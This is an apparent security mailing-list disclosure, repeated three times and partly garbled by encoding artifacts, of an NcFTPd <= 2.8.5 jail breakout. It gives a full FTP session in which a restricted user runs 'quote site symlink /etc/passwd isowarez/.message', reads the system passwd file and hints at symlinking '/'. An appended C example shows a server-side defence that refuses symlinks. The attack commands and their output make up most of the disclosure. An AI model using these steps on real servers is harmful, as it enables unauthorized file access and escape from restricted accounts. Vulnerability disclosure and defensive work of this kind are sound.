> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <= 2.8.5 remote jail breakout
>
> Discovered by:
>         Kingcope
>         Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
>         27th July 2009
>
> Greetings:
>         Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
>         Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like ´/´
>
> Cheerio,
>
> Kingcope
>
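
The session quoted above works because the server follows a user-created symlink when it displays .message on a directory change. A server-side check that refuses such links, as an added example (not NcFTPd's code or its vendor's fix): `open_in_jail_nofollow` and `run_demo` are hypothetical names, and the jail is a constructed temporary directory.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open relpath (an FTP virtual path) below jail_root for reading without
 * following any symbolic link: each component is opened relative to the
 * previous one with O_NOFOLLOW. Returns an fd, or -1 if refused. */
int open_in_jail_nofollow(const char *jail_root, const char *relpath)
{
    char buf[PATH_MAX], *save = NULL, *comp, *next;
    struct stat st;
    int dirfd, fd;

    if (strlen(relpath) >= sizeof(buf))
        return -1;
    strcpy(buf, relpath);
    if ((dirfd = open(jail_root, O_RDONLY | O_DIRECTORY)) < 0)
        return -1;
    for (comp = strtok_r(buf, "/", &save); comp != NULL; comp = next) {
        next = strtok_r(NULL, "/", &save);
        /* Refuse ".."; intermediate components must be real directories;
         * the last is opened non-blocking so a FIFO cannot stall us. */
        fd = strcmp(comp, "..") == 0 ? -1 :
             openat(dirfd, comp, O_RDONLY | O_NOFOLLOW |
                                 (next ? O_DIRECTORY : O_NONBLOCK));
        close(dirfd);
        if (fd < 0)
            return -1;          /* also the result when comp is a symlink */
        dirfd = fd;
    }
    /* An empty path leaves dirfd on the jail root, which is rejected here. */
    if (fstat(dirfd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(dirfd);           /* only regular files qualify */
        return -1;
    }
    return dirfd;
}

/* Constructed demo: a throwaway jail with one honest .message, one
 * .message symlinked to /etc/passwd and one directory symlink to /etc.
 * Returns 0 when all three cases behave as intended. */
int run_demo(void)
{
    char root[] = "/tmp/jaildemoXXXXXX";
    int r = -1, fd, rc = 0;

    if (mkdtemp(root) == NULL || (r = open(root, O_RDONLY | O_DIRECTORY)) < 0)
        return 1;
    if (mkdirat(r, "pub", 0700) != 0 || mkdirat(r, "isowarez", 0700) != 0)
        return 2;
    if ((fd = openat(r, "pub/.message", O_WRONLY | O_CREAT, 0600)) < 0)
        return 3;
    close(fd);
    if (symlinkat("/etc/passwd", r, "isowarez/.message") != 0 ||
        symlinkat("/etc", r, "esc") != 0)
        return 4;
    if ((fd = open_in_jail_nofollow(root, "/pub/.message")) < 0)
        rc = 5;                 /* honest file must open */
    else
        close(fd);
    if ((fd = open_in_jail_nofollow(root, "/isowarez/.message")) >= 0) {
        close(fd);
        rc = 6;                 /* file symlink must be refused */
    }
    if ((fd = open_in_jail_nofollow(root, "/esc/passwd")) >= 0) {
        close(fd);
        rc = 7;                 /* directory symlink must be refused */
    }
    unlinkat(r, "pub/.message", 0);
    unlinkat(r, "isowarez/.message", 0);
    unlinkat(r, "esc", 0);
    unlinkat(r, "pub", AT_REMOVEDIR);
    unlinkat(r, "isowarez", AT_REMOVEDIR);
    close(r);
    rmdir(root);
    return rc;
}

int main(void)
{
    printf("run_demo() = %d (0 means all three cases passed)\n", run_demo());
    return 0;
}
```

Walking the path one component at a time with `openat` avoids the check-then-open race that a `realpath` comparison followed by a separate `open` would leave.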

